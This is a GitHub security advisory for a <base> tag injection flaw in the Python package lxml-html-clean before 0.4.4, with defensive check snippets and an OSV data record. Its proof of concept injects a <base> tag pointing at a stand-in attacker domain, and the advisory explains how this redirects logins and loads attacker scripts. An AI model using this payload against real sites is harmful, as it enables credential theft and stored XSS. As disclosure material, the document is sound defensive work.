GHSA-XVP8-3MHV-424C

Vulnerability from github – Published: 2026-03-02 19:35 – Updated: 2026-03-05 22:49
Summary
lxml-html-clean has <base> tag injection through default Cleaner configuration
Details

Summary

The <base> tag passes through the default Cleaner configuration. While page_structure=True removes html, head, and title tags, there is no specific handling for <base>, allowing an attacker to inject it and hijack relative links on the page.

Details

In affected versions (0.4.3 and earlier), the <base> tag is not in the page_structure kill set. Even though the specification says <base> must be inside <head>, browsers accept <base> tags outside of the head.

If an attacker injects a <base> tag, it changes the base URL for all relative URLs on the page (links, images, scripts) to a domain controlled by the attacker.
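The effect on URL resolution can be approximated with the standard library. This is a minimal sketch, not browser code: `PAGE_URL` and the `resolve` helper are hypothetical names chosen for illustration, and `urljoin` only approximates the browser's resolution algorithm.

```python
from typing import Optional
from urllib.parse import urljoin

# Hypothetical values for illustration only.
PAGE_URL = "https://app.example/profile"  # page that embeds the sanitized HTML
INJECTED_BASE = "http://evil.com/"        # href of the injected <base> tag


def resolve(reference: str, base_href: Optional[str] = None) -> str:
    """Resolve a URL reference against <base href> when one is present,
    otherwise against the URL of the page itself."""
    document_base = urljoin(PAGE_URL, base_href) if base_href else PAGE_URL
    return urljoin(document_base, reference)


for ref in ("/account", "assets/app.js", "https://cdn.example/lib.js"):
    print(f"{ref!r}: {resolve(ref)} -> {resolve(ref, INJECTED_BASE)}")
```

Under these assumptions, both the path-absolute reference (`/account`) and the path-relative one (`assets/app.js`) move to the attacker's origin, while the fully qualified URL is unaffected.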

PoC

from lxml_html_clean import clean_html

# The base tag is preserved in the output
result = clean_html('<base href="http://evil.com/"><a href="/account">Account</a>')
print(result)
# Output: <div><base href="http://evil.com/">...<a href="/account">Account</a></div>
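As a defense-in-depth check, an application could scan sanitized output for surviving <base> tags before rendering it. The sketch below uses only the standard library; `BaseTagFinder`, `find_base_hrefs`, and the sample string are hypothetical and are not part of lxml-html-clean.

```python
from html.parser import HTMLParser


class BaseTagFinder(HTMLParser):
    """Collects the href value of every <base> start tag in a fragment."""

    def __init__(self):
        super().__init__()
        self.base_hrefs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so <BASE HREF=...>
        # is matched as well.
        if tag == "base":
            self.base_hrefs.append(dict(attrs).get("href"))


def find_base_hrefs(html: str) -> list:
    """Return the href of each <base> tag found in `html` (None if absent)."""
    finder = BaseTagFinder()
    finder.feed(html)
    finder.close()
    return finder.base_hrefs


# Hypothetical sanitized fragment that still carries an injected <base> tag.
sample = '<div><base href="http://evil.com/"><a href="/account">Account</a></div>'
print(find_base_hrefs(sample))
```

A non-empty result means the fragment should be rejected or cleaned again. On versions without the fix, passing "base" in the Cleaner's kill_tags option is another possible workaround, though upgrading to 0.4.4 is the remedy named in the advisory data.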

Impact

The injection of a <base> tag allows an attacker to hijack the resolution of all relative URLs on the page. This results in three critical attack vectors:

  1. Phishing & Redirection: Attackers can redirect user navigation (e.g., <a href="/login">) and form submissions (e.g., <form action="/auth">) to an attacker-controlled domain, effectively stealing credentials or sensitive data without the user realizing they have left the legitimate site.
  2. Cross-Site Scripting (XSS): If the victim application loads JavaScript files using relative paths (e.g., <script src="assets/app.js">), the browser will attempt to fetch the script from the attacker's domain. This upgrades the vulnerability from HTML injection to full Stored XSS.
  3. Defacement: Relative references to images (<img>) and stylesheets (<link>) will be loaded from the attacker's server, allowing for UI redressing or defacement.

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.4.3"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "lxml-html-clean"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-28350"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-116"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-02T19:35:52Z",
    "nvd_published_at": "2026-03-05T20:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe `\u003cbase\u003e` tag passes through the default `Cleaner` configuration. While `page_structure=True` removes `html`, `head`, and `title` tags, there is no specific handling for `\u003cbase\u003e`, allowing an attacker to inject it and hijack relative links on the page.\n\n### Details\nThe `\u003cbase\u003e` tag is not currently in the `page_structure` kill set. Even though the specification says `\u003cbase\u003e` must be inside `\u003chead\u003e`, browsers accept `\u003cbase\u003e` tags outside of the head.\n\nIf an attacker injects a `\u003cbase\u003e` tag, it changes the base URL for all relative URLs on the page (links, images, scripts) to a domain controlled by the attacker.\n\n### PoC\n```python\nfrom lxml_html_clean import clean_html\n\n# The base tag is preserved in the output\nresult = clean_html(\u0027\u003cbase href=\"http://evil.com/\"\u003e\u003ca href=\"/account\"\u003eAccount\u003c/a\u003e\u0027)\nprint(result)\n# Output: \u003cdiv\u003e\u003cbase href=\"http://evil.com/\"\u003e...\u003ca href=\"/account\"\u003eAccount\u003c/a\u003e\u003c/div\u003e\n```\n\n### Impact\nThe injection of a `\u003cbase\u003e` tag allows an attacker to hijack the resolution of **all** relative URLs on the page. This results in three critical attack vectors:\n\n1.  **Phishing \u0026 Redirection:** Attackers can redirect user navigation (e.g., `\u003ca href=\"/login\"\u003e`) and form submissions (e.g., `\u003cform action=\"/auth\"\u003e`) to an attacker-controlled domain, effectively stealing credentials or sensitive data without the user realizing they have left the legitimate site.\n2.  **Cross-Site Scripting (XSS):** If the victim application loads JavaScript files using relative paths (e.g., `\u003cscript src=\"assets/app.js\"\u003e`), the browser will attempt to fetch the script from the attacker\u0027s domain. This upgrades the vulnerability from HTML injection to full Stored XSS.\n3.  **Defacement:** Relative references to images (`\u003cimg\u003e`) and stylesheets (`\u003clink\u003e`) will be loaded from the attacker\u0027s server, allowing for UI redressing or defacement.",
  "id": "GHSA-xvp8-3mhv-424c",
  "modified": "2026-03-05T22:49:24Z",
  "published": "2026-03-02T19:35:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/security/advisories/GHSA-xvp8-3mhv-424c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28350"
    },
    {
      "type": "WEB",
      "url": "https://github.com/fedora-python/lxml_html_clean/commit/9c5612ca33b941eec4178abf8a5294b103403f34"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fedora-python/lxml_html_clean"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "lxml-html-clean has \u003cbase\u003e tag injection through default Cleaner configuration"
}
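
The version range in the record above (introduced at 0, fixed in 0.4.4) can be turned into a quick local check. This is a minimal sketch: `parse_version` and `is_affected` are hypothetical helpers, and the parsing assumes plain dotted numeric versions such as "0.4.3", not pre-release or post-release suffixes.

```python
from importlib.metadata import PackageNotFoundError, version


def parse_version(text: str) -> tuple:
    """Turn '0.4.3' into (0, 4, 3). Assumes purely numeric dotted parts."""
    return tuple(int(part) for part in text.split("."))


# "fixed" event taken from the advisory record.
FIXED_IN = parse_version("0.4.4")


def is_affected(installed: str) -> bool:
    """True when `installed` is older than the first fixed release."""
    return parse_version(installed) < FIXED_IN


try:
    installed = version("lxml-html-clean")
except PackageNotFoundError:
    print("lxml-html-clean is not installed")
else:
    status = "affected" if is_affected(installed) else "not affected"
    print(f"lxml-html-clean {installed}: {status}")
```

For real dependency auditing, a dedicated version parser and an advisory-aware scanner are the more robust choice; the tuple comparison here only illustrates the range logic.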

